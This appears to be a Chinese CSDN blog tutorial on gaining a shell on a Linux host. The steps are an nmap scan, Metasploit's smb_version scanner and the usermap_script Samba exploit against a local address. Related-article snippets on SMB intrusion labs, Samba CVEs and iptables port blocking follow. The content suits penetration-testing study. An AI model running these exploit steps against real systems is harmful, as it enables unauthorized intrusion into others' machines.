linux端口利用入侵,利用samba服务漏洞入侵linux主机

最新推荐文章于 2024-08-19 19:20:19 发布
最新推荐文章于 2024-08-19 19:20:19 发布
阅读量280 收藏
点赞数
文章标签: linux端口利用入侵
本文详细介绍了如何使用Metasploit框架针对Linux主机上的Samba服务进行漏洞利用。首先,通过nmap扫描目标主机的139和445端口,确认Samba服务的存在。接着,利用Metasploit的smb_version模块确定Samba版本,然后使用usermap_script模块尝试远程溢出漏洞,最终成功创建shell会话,入侵远程Linux主机。
摘要由CSDN通过智能技术生成

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机. step1) 首先要扫描目标主机上开放的端口和服务,用nmap,命令如下: nmap

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机.

step1)首先要扫描目标主机上开放的端口和服务,用nmap,命令如下:

nmap-sS -Pn -A 192.168.2.142

92706c3e464545033066642b6717ab49.png

step2)发现主机上开放的139,445端口之后,说明该主机有可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话,需要用到metasploit.

step3)打开metasploit之后需要先判断samba的版本,命令如下:

-msf> search scanner/samba

这条命令用来查找samba相关exploit参数

27fcd2676e9fc577c84c48c4bfff205a.png

step4)然后使用如下命令来定义要扫描samba的版本所用到的exploits参数。

msf> use auxiliary/scanner/smb/smb_version

msfauxiliary(smb_version) > set RHOSTS 192.168.2.142

这条命令定义你将要扫描samba版本的远程主机的IP地址.

exploit

该命令将开始漏洞利用

7a9c32f6668a63c3e6cfa2b2d27ef3ab.png

step5)发现samba版本之后,我们需要进一步利用来入侵进入到远程linux主机

msf> use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set RHOST 192.168.2.142

msf exploit(usermap_script) > exploit

执行完成以上命令如图所示,成功创建了shell 会话.

f617422534afac20ac4872529aa75515.png

同步齿科-方
关注
[系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
杨秀璋的专栏
12-30 5170
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口。这篇文章将详细讲解SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制,利用端口
Windows SMB 入侵实验
m0_63645854的博客
04-10 375
使用 Hydra 来暴力破解靶机的 Administrator 用户的密码。4. 通过建立空连接,使靶机自动定时执行 BAT 文件,开启远程桌面服务。通过建立空连接,使靶机自动定时执行 BAT 文件,开启远程桌面服务。3. 通过隐藏共享把开启远程桌面的 BAT 上传至靶机的 E 盘。通过隐藏共享把开启远程桌面的 BAT 上传至靶机的 C 盘。1. 通过 NMap 扫描靶机所在的整个 C 类地址段。通过 NMap 扫描靶机所在的整个 C 类地址段。使用攻击机远程连接靶机,获取完全控制权。
一个在Linux系统下的入侵响应案例
03-10 685
受到攻击 最近,某校校园网管理员接到国外用户投诉,说该校园网中的一台视频服务器正在对外进行非法的TCP 443端口扫描。该视频服务器的地址是192.168.1.10,操作系统为redhat7.3,对外开放端口为TCP 22、80、443。 然而,管理员在机器上经过重重仔细检查,未观察到任何异常。在此情况下,我们接受请求帮助他们检查机器。 初步检测 我们首先在交换
Metasploit漏洞利用系列(六):MSF渗透测试 - 利用Samba服务漏洞入侵Linux主机实战
最新发布
2402_86373248的博客
08-19 559
在本系列的第六篇文章中,我们将深入探究如何利用Metasploit Framework (MSF) 针对Samba服务存在的漏洞进行Linux主机的渗透测试。1. 搭建测试环境:在虚拟化环境中部署一个具有Samba服务Linux主机,确保其版本包含已知漏洞,例如早期的Samba 3.x或4.x版本。通过Samba服务漏洞,发送恶意数据包至目标主机,触发漏洞利用,一旦成功,将在Metasploit控制台上获得一个Meterpreter会话。根据识别到的Samba版本,选择相应的漏洞利用模块。
Samba漏洞
weixin_33701617的博客
05-25 174
Samba 团队发布安全通告(https://www.samba.org/samba/security/CVE-2017-7494.html) ,并提供了补丁(https://arstechnica.com/security/2017/05/a-wormable-code-execution-bug-has-lurked-in-samba-for-7-years-patch-now/)。一个一直存...
linux攻击端口,Linux 常见攻击端口封杀表
weixin_29191761的博客
04-30 75
# Vi /etc/sysconfig/iptables# INPUT-A INPUT -p tcp --dport 135 -j REJECT-A INPUT -p udp --dport 135 -j REJECT-A INPUT -p tcp --dport 136 -j REJECT-A INPUT -p udp --dport 136 -j REJECT-A INPUT -p tcp -...
打造安全的Linux系统[第五讲]——Linux系统的入侵对抗.pdf
09-07
接下来,攻击者会利用漏洞扫描工具对网络成员进行检查,例如TCP端口扫描、RPC服务列表、NFS输出列表、共享资源(如Samba、NetBIOS)以及默认账号检查等。这些工具还会检测SMTP、IMAP、POP3等服务的版本和漏洞。 在...
等保2.0测评:Linux主机安全
weixin_72321307的博客
11-04 1142
空(-,0),文件的权限分为属主(拥有者)、属组、其它用户和用户组的权限。可基于可信根对计算设备的系统引导程序、 系统程序、重要配置参数和应用程序等进行可信验证,并在应用程序的关键执行环节进行动态可信验证,在检测到其可信性受到破坏后进行报警,并将验证结果形成审计记录送至安全管理中心。Linux系统已经对一些默认账户和系统文件分配了不同的权限,也就是说主体已经达到了用户级,客体已经达到了文件级,该项主要检查新建用户和文件是否存在权限过大、权限滥用的情况。或借助于堡垒机来进行多重认证,降低安全风险。
端口可能出现的漏洞
qq_49015005的博客
06-30 1050
tcp 110 POP3 可尝试爆破,嗅探 tcp 111,2049 NFS 权限配置不当 tcp 137,139,445 Samba 可尝试爆破以及smb自身的各种远程执行类漏洞利用,如,ms08-067,ms17-010,嗅探等 tcp 143 IMAP 可尝试爆破 udp 161 SNMP 爆破默认团队字符串,搜集目标内网信息 tcp 389 LDAP ldap注入,允许匿名访问,弱口令 tcp 512,513,514 Linux rexec 可爆破,rlogin登陆 tcp 873 Rsync 匿名
SMB渗透
weixin_42328919的博客
02-25 2900
SMB渗透学习过程 1.SMB介绍 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。 百度百科 准备条件:kali 攻击机:192.168.31.101 靶场: 192.168...
linux攻击端口,Linux常见攻击端口封杀表
weixin_36324695的博客
04-30 69
# Vi /etc/sysconfig/iptables# INPUT-A INPUT -p tcp --dport 135 -j REJECT-A INPUT -p udp --dport 135 -j REJECT-A INPUT -p tcp --dport 136 -j REJECT-A INPUT -p udp --dport 136 -j REJECT-A INPUT -p tcp -...
linux 端口相关问题
sangky的专栏
06-25 155
原因:写http服务时,经常会出现端口占用的情况,怎么解决 1)查看有哪些端口被占用了 命令netstat 比如产看tcp 5001 sudo netstat -tlp | grep 5001 2)使用lsof -i :port 查看使用该端口的进程。(可以删除该进程,释放端口)...
入门渗透:SMB入侵——Dancing
栉风沐雪的博客
02-01 736
SMB(全称是Server Message Block),被用于Web连接和客户端与服务器之间的信息沟通一般运行服务于445号端口,用于在计算机间共享文件、打印机、串口等SMB工作过程:版本协商 会话请求凭据 文件路径凭据 对共享资源进行操作在下文使用的是hackthebox的Dancing靶机。
linux smb 漏洞_[原创]Linux cve-2017-7494samba远程漏洞利用和分析
weixin_42520661的博客
01-13 472
漏洞背景:Samba是在Linux和UNIX系统上实现SMB协议的一个软件,2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494,漏洞影响了Samba3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本,,确认属于严重漏洞,可以造成远程代码执行。环境搭建:靶机环境 : Li...
不定期渗透日记:记一次 Samba 服务器渗透
m0_61869253的博客
08-07 173
本次渗透皆为靶机环境,实则为上一篇靶机 Prime level 1的后续。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
ctf:kali2:渗透Samba:exploit/multi/samba/usermap_script
viviliving的专栏
12-09 1443
从输出的信息中,可以看到成功的打开了一个会话。这表示已成功攻击了目标主机。此时用户可以执行一些Linux命令,查看目标主机的相关信息。从输出的信息中,可以看到当前目标系统登录的用户名是root。如果想了解该用户的详细信息,可以使用id命令查看。输出的信息表上root用户属于root组,并且其UID和GID都为0。whoami #查看当前登录系统的用户。id #查看当前登录用户的信息。
渗透测试——利用Samba服务SambaCry获取shell
weixin_43520214的博客
03-22 4243
渗透测试——利用Samba服务SambaCry获取shell
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2437
samba漏洞
Linux Samba服务器配置与应用详解
Samba是连接Linux和Windows网络的关键工具,它提供了跨平台的文件和打印服务,使得不同操作系统的集成变得更加简单。理解和熟练配置Samba服务器对于任何希望在Linux环境中实现多平台协作的IT专业人员来说都是必不可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值